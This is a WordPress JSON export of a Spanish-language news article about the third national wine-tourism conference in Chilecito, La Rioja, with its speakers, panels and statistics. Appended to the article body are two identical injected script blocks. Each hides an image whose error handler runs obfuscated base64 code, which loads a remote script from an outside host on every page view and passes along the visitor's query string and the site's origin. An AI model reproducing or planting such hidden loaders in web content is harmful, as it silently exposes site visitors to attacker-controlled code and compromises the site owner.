{"id":3283,"date":"2023-11-13T11:08:51","date_gmt":"2023-11-13T14:08:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3283"},"modified":"2025-08-14T00:05:28","modified_gmt":"2025-08-14T03:05:28","slug":"exitoso-inicio-de-las-iii-jornadas-nacionales-de-turismo-del-vino-en-la-rioja","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3283","title":{"rendered":"Exitoso inicio de las III Jornadas Nacionales de Turismo del Vino en La Rioja"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\">Se realizaron talleres, presentaciones, charlas, y conferencias con disertantes y especialistas en la tem\u00e1tica en la localidad de Chilecito.<\/h3>\n\n\n\n<p>Las jornadas, organizadas por el Gobierno de La Rioja, el Ministerio de Turismo y Deportes de la Naci\u00f3n y la Corporaci\u00f3n Vitivin\u00edcola Argentina (COVIAR), con el acompa\u00f1amiento del Consejo Federal del Turismo (CFT), el Instituto de Promoci\u00f3n Tur\u00edstica (INPROTUR), la C\u00e1mara Argentina de Turismo, Aerol\u00edneas Argentinas y la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo (FAEVYT), se presentaron como un&nbsp;<strong>espacio de di\u00e1logo, intercambio, capacitaci\u00f3n y formaci\u00f3n<\/strong>&nbsp;a fin de seguir impulsando el desarrollo del sector tur\u00edstico, la gastronom\u00eda y su relaci\u00f3n con la producci\u00f3n de vinos en nuestro pa\u00eds.<\/p>\n\n\n\n<p>La apertura de las jornadas cont\u00f3 con la presencia del gobernador de La Rioja,&nbsp;<strong>Ricardo Quintela<\/strong>; de la secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>; del intendente de Chilecito,&nbsp;<strong>Rodrigo Brizuela y Doria<\/strong>; del presidente de Coviar,&nbsp;<strong>Mario Gonz\u00e1lez<\/strong>; y del director Nacional de Planificaci\u00f3n del Desarrollo Tur\u00edstico,&nbsp;<strong>Sergio Castro<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img-20231109-wa0006.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p><em>\u00abEl turismo est\u00e1 a la vanguardia del desarrollo y es una de las principales actividades generadoras de riqueza y fuentes de trabajo genuino en la Argentina\u201d<\/em>, destac\u00f3&nbsp;<strong>Quintela<\/strong>, mientras que&nbsp;<strong>Yanina Mart\u00ednez<\/strong>&nbsp;resalt\u00f3 que&nbsp;<em>\u201cel enoturismo es una herramienta fabulosa para generar empleo. Argentina es el 7\u00b0 productor de vinos en el mundo, con m\u00e1s 250.000 hect\u00e1reas de vi\u00f1edos cultivados que generan 400.000 puestos de trabajos entre directos e indirectos. Desde el minuto cero de la gesti\u00f3n cre\u00edmos en el turismo del vino y comenzamos un plan de trabajo para que el enoturismo sea una marca pa\u00eds de Argentina apostando a la diversidad\u201d<\/em>, agreg\u00f3 Yanina Mart\u00ednez, quien adem\u00e1s destac\u00f3 que en la actualidad son 16 las provincias con oferta tur\u00edstica vinculada al vino,&nbsp;<em>\u201cque es una actividad generadora de oportunidades\u201d<\/em>.<\/p>\n\n\n\n<p>Desde COVIAR, en representaci\u00f3n del sector vitivin\u00edcola argentino, su presidente&nbsp;<strong>Mario Gonz\u00e1lez<\/strong>, destac\u00f3 la&nbsp;<em>\u201cvirtuosa articulaci\u00f3n p\u00fablico-privada que especialmente tenemos para el desarrollo del turismo del vino en Argentina\u201d<\/em>. Y puso como ejemplo, la ejecuci\u00f3n con \u00e9xito de dos etapas del Fondo para el Desarrollo del Enoturismo en la Argentina, que ejecut\u00f3 en tiempo r\u00e9cord la entrega $600 millones para beneficiar a 265 proyectos en 15 provincias para mejoras de infraestructura, servicios y capacitaci\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img-20231109-wa0007.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>En tanto,&nbsp;<strong>Sergio Castro<\/strong>&nbsp;resalt\u00f3 que&nbsp;<em>\u201cestas jornadas de Turismo del Vino son una manera de mostrar la actividad de una forma potente en el desarrollo local con equidad e inclusi\u00f3n\u201d<\/em>. Y agreg\u00f3 que&nbsp;<em>\u201cen enoturismo, el sector p\u00fablico y el privado crearon exitosamente un plan, se le dio continuidad y se lo sigue potenciando, incluyendo variables y actores para que el sector tur\u00edstico contin\u00fae liderando la recuperaci\u00f3n del empleo en Argentina\u201d<\/em>.<\/p>\n\n\n\n<p>Este encuentro federal, que cont\u00f3 con la participaci\u00f3n de casi&nbsp;<strong>400 personas<\/strong>&nbsp;entre profesionales de la actividad vin\u00edcola, emprendedores y p\u00fablico en general, tuvo como objetivo&nbsp;<strong>fortalecer el enoturismo en las diecis\u00e9is provincias<\/strong>&nbsp;que hoy tienen proyectos vitivin\u00edcolas abiertos al turismo.<br>La primera jornada comenz\u00f3 con una conferencia magistral de&nbsp;<strong>V\u00edctor Manuel Sixto<\/strong>&nbsp;sobre \u201cClaves para el dise\u00f1o de experiencias tur\u00edsticas\u201d y la importancia de que \u00e9stas sean innovadoras, sostenibles y digitales para lograr un plus para los visitantes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img-20231109-wa0008.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Camilo Mak\u00f3n<\/strong>, por su parte, present\u00f3 los resultados del Observatorio Econ\u00f3mico del Turismo del Vino, del que se desprende la importancia de esta actividad. El dato m\u00e1s relevante: en los primeros 8 meses del 2023, los gastos en experiencias de enoturismo llegan ya a\u00a0<strong>92,5 millones de d\u00f3lares<\/strong>, casi alcanzando lo que se gener\u00f3 durante todo el a\u00f1o anterior. Asimismo, se superaron los datos del 2022 en cantidad de turistas, con casi 23 millones de visitantes nacionales e internacionales. En relaci\u00f3n con las bodegas abiertas al turismo, en este a\u00f1o llegaron a las\u00a0<strong>385 en 16 provincias<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2023-11-10_at_15.16.02.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Luego se realiz\u00f3 un panel de expertos que desarrollaron la tem\u00e1tica&nbsp;<strong>\u201cExperiencias innovadoras del Turismo del Vino\u201d<\/strong>, con la participaci\u00f3n de referentes de las bodegas Alma Minera de C\u00f3rdoba, Stocco de Viani de Mendoza, Cielos de Gualjaina de Chubut, Familia Sacavino Arrieta de La Rioja, y Cara Sur de San Juan, quienes contaron el inicio de sus emprendimientos, c\u00f3mo es la producci\u00f3n, el tipo de visitas que tienen las bodegas, c\u00f3mo fue la implementaci\u00f3n de las mismas, y cu\u00e1l es el valor agregado que buscan para sorprender a los turistas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img-20231109-wa0009.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>El panel siguiente, en tanto, estuvo focalizado en la\u00a0<strong>\u201cComercializaci\u00f3n Turismo del Vino y el rol de las agencias en la creaci\u00f3n del valor agregado\u00bb<\/strong>. Estuvieron por FAEVyT Leopoldo Badoul; por Agencias Buenos Aires, Yesica Gim\u00e9nez; y por la Agencia de Mendoza, Sof\u00eda Ruiz Cavanagh. En este espacio, moderado por\u00a0<strong>Javier Espina<\/strong>, coordinador del Consejo Federal de Turismo, se relat\u00f3 la importancia del trabajo conjunto entre las bodegas y las agencias de viaje.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img-20231109-wa0010.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>El \u00faltimo panel del d\u00eda fue\u00a0<strong>\u00abModelos innovadores de gobernanza en el \u00e1mbito del turismo del vino\u201d<\/strong>, del que participaron el secretario de Turismo de La Rioja, Jos\u00e9 Rosa; el director general de Productos Tur\u00edsticos de Salta, Javier Arias; el coordinador de Turismo del Vino de Coviar, Rodrigo Lemos; de la direcci\u00f3n de Turismo de Maip\u00fa, Alejandra Fuenzalida; y de R\u00edo Negro, Mar\u00eda Jos\u00e9 Diomedi. En este caso se focaliz\u00f3 en la\u00a0<strong>importancia de la pol\u00edtica de estado<\/strong>, que a partir de la gesti\u00f3n se refuerce la identidad, la capacitaci\u00f3n, la colaboraci\u00f3n p\u00fablico-privada, las alianzas con diferentes actividades tur\u00edsticas, el crecimiento sostenible, y la generaci\u00f3n de empleo de calidad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img-20231109-wa0013.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Romina Sorrentino<\/strong>, directora de Promoci\u00f3n Estrat\u00e9gica del Turismo, relat\u00f3 la experiencia del programa\u00a0<strong>GustAR<\/strong>\u00a0y las cocinas abiertas que se realizaron en Buenos Aires, valorando los productos y los platos identitarios de cada provincia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2023-11-10_at_15.16.01.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Tambi\u00e9n se realiz\u00f3 una exposici\u00f3n de la chef argentina Patricia Curtois, quien llev\u00f3 a cabo un relato de la experiencia gastron\u00f3mica y del vino.<br>Finalmente, el cierre estuvo a cargo de Agust\u00edn Neglia, quien relato su experiencia visitando bodegas de Argentina y del mundo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/img-20231109-wa0012.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La segunda jornada estuvo abocada a las\u00a0<strong>visitas t\u00e9cnicas<\/strong>\u00a0a Bodega La Riojana Cooperativa, Bodega Valle de La Puerta y Bodega Casa de Hu\u00e9spedes Cha\u00f1armuyo.<br>Todo el evento fue transmitido en vivo, y finalizado el mismo se realiz\u00f3 un stream con Flor de Bodegas, Nato Steller y Karem Apaza Flores, con degustaciones y entrevistas.<br>Para ver toda la Jornada Nacional de Turismo del Vino<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<div class=\"youtube-embed\" data-video_id=\"\"><iframe title=\"III Jornadas Nacionales de Turismo del Vino\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/NpWYKhVg33k?feature=oembed&#038;enablejsapi=1\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe><\/div>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se realizaron talleres, presentaciones, charlas, y conferencias con disertantes y especialistas en la tem\u00e1tica en la localidad de Chilecito. Las jornadas, organizadas por el Gobierno de La Rioja, el Ministerio de Turismo y Deportes de la Naci\u00f3n y la Corporaci\u00f3n Vitivin\u00edcola Argentina (COVIAR), con el acompa\u00f1amiento del Consejo Federal del Turismo (CFT), el Instituto de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3284,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,20],"tags":[],"class_list":{"0":"post-3283","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3283"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3283"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3283\/revisions"}],"predecessor-version":[{"id":6921,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3283\/revisions\/6921"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3284"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3283"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3283"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3283"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}